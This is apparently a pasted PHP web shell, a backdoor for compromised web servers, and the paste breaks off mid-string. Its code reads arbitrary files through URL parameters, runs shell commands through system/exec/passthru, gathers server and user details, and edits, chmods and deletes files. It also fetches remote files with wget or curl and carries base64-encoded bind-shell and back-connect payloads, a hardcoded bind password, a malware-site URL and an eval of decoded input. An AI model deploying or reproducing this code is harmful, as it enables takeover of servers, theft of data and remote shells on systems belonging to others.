· 9 years ago · Apr 01, 2017, 11:16 AM
1
2if(isset($_GET['dl']) && ($_GET['dl'] != "")){
3 $file = $_GET['dl'];
4 $filez = @file_get_contents($file);
5 header("Content-type: application/octet-stream");
6 header("Content-length: ".strlen($filez));
7 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
8 echo $filez;
9 exit;
10}
11elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
12 $file = $_GET['dlgzip'];
13 $filez = gzencode(@file_get_contents($file));
14 header("Content-Type:application/x-gzip\n");
15 header("Content-length: ".strlen($filez));
16 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
17 echo $filez;
18 exit;
19}
20// view image
21if(isset($_GET['img'])){
22 @ob_clean();
23 $d = magicboom($_GET['y']);
24 $f = $_GET['img'];
25 $inf = @getimagesize($d.$f);
26 $ext = explode($f,".");
27 $ext = $ext[count($ext)-1];
28 @header("Content-type: ".$inf["mime"]);
29 @header("Cache-control: public");
30 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
31 @header("Cache-control: max-age=".(60*60*24*7));
32 @readfile($d.$f);
33 exit;
34}
35
36// server software
37$software = getenv("SERVER_SOFTWARE");
38// check safemode
39if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
40// uname -a
41$system = @php_uname();
42// mysql
43function showstat($stat) {if ($stat=="on") {return "<b><font style='color:white'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
44function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
45function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
46function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
47function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
48// check os
49if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
50else $win = FALSE;
51// change directory
52if(isset($_GET['y'])){
53 if(@is_dir($_GET['view'])){
54 $pwd = $_GET['view'];
55 @chdir($pwd);
56 }
57 else{
58 $pwd = $_GET['y'];
59 @chdir($pwd);
60 }
61}
62//hdd
63function convertByte($s) {
64if($s >= 1073741824)
65return sprintf('%1.2f',$s / 1073741824 ).' GB';
66elseif($s >= 1048576)
67return sprintf('%1.2f',$s / 1048576 ) .' MB';
68elseif($s >= 1024)
69return sprintf('%1.2f',$s / 1024 ) .' KB';
70else
71return $s .' B';
72}
73
74// username, id, shell prompt and working directory
75if(!$win){
76 if(!$user = rapih(exe("whoami"))) $user = "";
77 if(!$id = rapih(exe("id"))) $id = "";
78 $prompt = $user." \$ ";
79 $pwd = @getcwd().DIRECTORY_SEPARATOR;
80}
81else {
82 $user = @get_current_user();
83 $id = $user;
84 $prompt = $user." >";
85 $pwd = realpath(".")."\\";
86 // find drive letters
87 $v = explode("\\",$d);
88 $v = $v[0];
89 foreach (range("A","Z") as $letter)
90 {
91 $bool = @is_dir($letter.":\\");
92 if ($bool)
93 {
94 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
95 if ($letter.":" != $v) {$letters .= $letter;}
96 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
97 $letters .= " ]</a> ";
98 }
99 }
100}
101
102function testoracle() {
103 if (function_exists('ocilogon')) { return showstat("on"); }
104 else { return showstat("off"); }
105 }
106
107function testmssql() {
108 if (function_exists('mssql_connect')) { return showstat("on"); }
109 else { return showstat("off"); }
110 }
111
112 function showdisablefunctions() {
113 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
114 else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
115 }
116
117if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
118else $posix = FALSE;
119// server ip
120$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
121// your ip ;-)
122$my_ip = $_SERVER['REMOTE_ADDR'];
123$admin_id=$_SERVER['SERVER_ADMIN'];
124$bindport = "13123";
125$bindport_pass = "asd123";
126//server port
127$serverport = $_SERVER["SERVER_PORT"];
128
129// separate the working direcotory
130$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
131$pwdurl = "";
132for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
133 $pathz = "";
134 for($j = 0 ; $j <= $i ; $j++){
135 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
136 }
137 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
138}
139
140// rename file or folder
141if(isset($_POST['rename'])){
142 $old = $_POST['oldname'];
143 $new = $_POST['newname'];
144 @rename($pwd.$old,$pwd.$new);
145 $file = $pwd.$new;
146}
147if(isset($_POST['chmod'])){
148 $name = $_POST['name'];
149 $value = $_POST['newvalue'];
150if (strlen($value)==3){
151 $value = 0 . "" . $value;}
152 @chmod($pwd.$name,octdec($value));
153 $file = $pwd.$name;}
154
155if(isset($_POST['chmod_folder'])){
156 $name = $_POST['name'];
157 $value = $_POST['newvalue'];
158if (strlen($value)==3){
159 $value = 0 . "" . $value;}
160 @chmod($pwd.$name,octdec($value));
161 $file = $pwd.$name;}
162
163
164// print useful info
165$buff = "Software : <b>".$software."</b><br />";
166$buff .= "System OS : <b>".$system."</b><br />";
167if($id != "") $buff .= "ID : <b>".$id."</b><br />";
168$buff .= "PHP Version : <b><font style='color:#ff0000'>".phpversion()."</b></font> on <b>".php_sapi_name()."</b><br />";
169$buff .= "Server ip : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Server Port : <b><font style='color:#ff0000'>".$serverport."</font><b> <span class=\"gaya\"> | </span>
170Your ip : <b><font style='color:#ff0000'>".$my_ip."</font></b><span class=\"gaya\"> | </span> Admin : <b><font style='color:white'>".$admin_id."</font></b><br />";
171$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
172if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b><font style='color:#ff0000'>ON</font></b></span><br />";
173else $buff .= "Safemode: <span class=\"gaya\"><b><font style='color:red'>OFF</b></font></span><br />";
174$buff .=" Time On Server : <b> ".date("d M Y H:i:s",time());
175$buff .= "<br> Disabled Functions: ".showdisablefunctions()."<br />";
176$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
177$buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
178$injbuff = " gw mah gak main logger bro slow :)";
179eval(base64_decode($injbuff));
180
181
182
183
184function rapih($text){
185 return trim(str_replace("<br />","",$text));
186}
187
188function magicboom($text){
189 if (!get_magic_quotes_gpc()) {
190 return $text;
191 }
192 return stripslashes($text);
193}
194
195function showdir($pwd,$prompt){
196 $fname = array();
197 $dname = array();
198 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
199 else $posix = FALSE;
200 $user = "????:????";
201 if($dh = @scandir($pwd)){
202 foreach($dh as $file){
203 if(is_dir($file)){
204 $dname[] = $file;
205 }
206 elseif(is_file($file)){
207 $fname[] = $file;
208 }
209 }
210 }
211 else{
212 if($dh = @opendir($pwd)){
213 while($file = @readdir($dh)){
214 if(@is_dir($file)){
215 $dname[] = $file;
216 }
217 elseif(@is_file($file)){
218 $fname[] = $file;
219 }
220 }
221 @closedir($dh);
222 }
223 }
224
225
226 sort($fname);
227 sort($dname);
228 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
229 $tree = @sizeof($path);
230 $parent = "";
231 $buff = "
232 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
233 <table class=\"cmdbox\" style=\"width:50%;\">
234 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
235 </form>
236 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
237 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
238 <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
239 </form></table><table class=\"explore\">
240 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
241 ";
242 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
243 else $parent = $pwd;
244
245 foreach($dname as $folder){
246 if($folder == ".") {
247 if(!$win && $posix){
248 $name=@posix_getpwuid(@fileowner($folder));
249 $group=@posix_getgrgid(@filegroup($folder));
250 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
251 }
252 else {
253 $owner = $user;
254 }
255 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
256 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
257 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
258 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
259 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
260 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
261 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
262 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
263 </form></td>
264
265 </tr>
266 ";
267 }
268 elseif($folder == "..") {
269 if(!$win && $posix){
270 $name=@posix_getpwuid(@fileowner($folder));
271 $group=@posix_getgrgid(@filegroup($folder));
272 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
273 }
274 else {
275 $owner = $user;
276 }
277 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
278 <td style=\"text-align:center;\">".$owner."</td>
279 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
280 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
281 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
282 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
283 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
284 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
285 </form>
286 </td></tr>";
287 }
288 else {
289 if(!$win && $posix){
290 $name=@posix_getpwuid(@fileowner($folder));
291 $group=@posix_getgrgid(@filegroup($folder));
292 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
293 }
294 else {
295 $owner = $user;
296 }
297 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
298 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
299 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
300 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
301 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
302 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
303 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
304 <td><center>
305 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
306 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
307 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
308 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
309 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
310 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
311 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
312 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
313 }
314 }
315
316 foreach($fname as $file){
317 $full = $pwd.$file;
318 if(!$win && $posix){
319 $name=@posix_getpwuid(@fileowner($folder));
320 $group=@posix_getgrgid(@filegroup($folder));
321 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
322 }
323 else {
324 $owner = $user;
325 }
326 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
327 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
328 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
329 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
330 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
331 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
332 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
333 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
334 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
335<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
336<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
337<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
338<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
339 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
340 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
341 }
342 $buff .= "</table>";
343 return $buff;
344}
345
346function ukuran($file){
347 if($size = @filesize($file)){
348 if($size <= 1024) return $size;
349 else{
350 if($size <= 1024*1024) {
351 $size = @round($size / 1024,2);;
352 return "$size kb";
353 }
354 else {
355 $size = @round($size / 1024 / 1024,2);
356 return "$size mb";
357 }
358 }
359 }
360 else return "???";
361}
362
363function exe($cmd){
364 if(function_exists('system')) {
365 @ob_start();
366 @system($cmd);
367 $buff = @ob_get_contents();
368 @ob_end_clean();
369 return $buff;
370 }
371 elseif(function_exists('exec')) {
372 @exec($cmd,$results);
373 $buff = "";
374 foreach($results as $result){
375 $buff .= $result;
376 }
377 return $buff;
378 }
379 elseif(function_exists('passthru')) {
380 @ob_start();
381 @passthru($cmd);
382 $buff = @ob_get_contents();
383 @ob_end_clean();
384 return $buff;
385 }
386 elseif(function_exists('shell_exec')){
387 $buff = @shell_exec($cmd);
388 return $buff;
389 }
390}
391
392function tulis($file,$text){
393 $textz = gzinflate(base64_decode($text));
394 if($filez = @fopen($file,"w"))
395 {
396 @fputs($filez,$textz);
397 @fclose($file);
398 }
399}
400
401function ambil($link,$file) {
402 if($fp = @fopen($link,"r")){
403 while(!feof($fp)) {
404 $cont.= @fread($fp,1024);
405 }
406 @fclose($fp);
407 $fp2 = @fopen($file,"w");
408 @fwrite($fp2,$cont);
409 @fclose($fp2);
410 }
411}
412
413function which($pr){
414 $path = exe("which $pr");
415 if(!empty($path)) { return trim($path); } else { return trim($pr); }
416}
417
418function download($cmd,$url){
419 $namafile = basename($url);
420 switch($cmd) {
421 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
422 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
423 case 'wfread' : ambil($wurl,$namafile);break;
424 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
425 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
426 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
427 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
428 default: break;
429 }
430 return $namafile;
431}
432
433function get_perms($file)
434{
435 if($mode=@fileperms($file)){
436 $perms='';
437 $perms .= ($mode & 00400) ? 'r' : '-';
438 $perms .= ($mode & 00200) ? 'w' : '-';
439 $perms .= ($mode & 00100) ? 'x' : '-';
440 $perms .= ($mode & 00040) ? 'r' : '-';
441 $perms .= ($mode & 00020) ? 'w' : '-';
442 $perms .= ($mode & 00010) ? 'x' : '-';
443 $perms .= ($mode & 00004) ? 'r' : '-';
444 $perms .= ($mode & 00002) ? 'w' : '-';
445 $perms .= ($mode & 00001) ? 'x' : '-';
446 return $perms;
447 }
448 else return "??????????";
449}
450
451function clearspace($text){
452 return str_replace(" ","_",$text);
453}
454
455
456// net tools
457$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
458+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
459P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
460dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
4613TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
462Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
463HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
464tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
465ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
466uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
467$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
468NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
469tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
470e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
471LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
472vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
473+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
474$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
475ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
476S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
477ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
478Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
479$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
480BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
481zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
482i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
483RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
484jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
4856f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
486// Malware Site
487$malsite = "http://fightagent.ru";
488 $self=$_SERVER["PHP_SELF"];
489
490//Mallattack
491$mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
492//PerlConfig
493$gantengers="IyEvdXNyL2Jpbi9tYW5udSAtSS91c3IvbG9jYWwvYmFuZG1pbg0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLmR6IHsNCmZvbnQtZmFtaWx5OiBUYWhvbWE7DQpmb250LXNpemU6IDE0cHg7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjMzMzM2ZmOw0KdGV4dC1hbGlnbjogY2VudGVyOw0KdGV4dC1zaGFkb3c6IGJsYWNrIDBweCAwcHggMnB4Ow0KfQ0KI2NoZWNrb3V0dGV4dGFyZWEgew0KDQp3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsNCg0Kf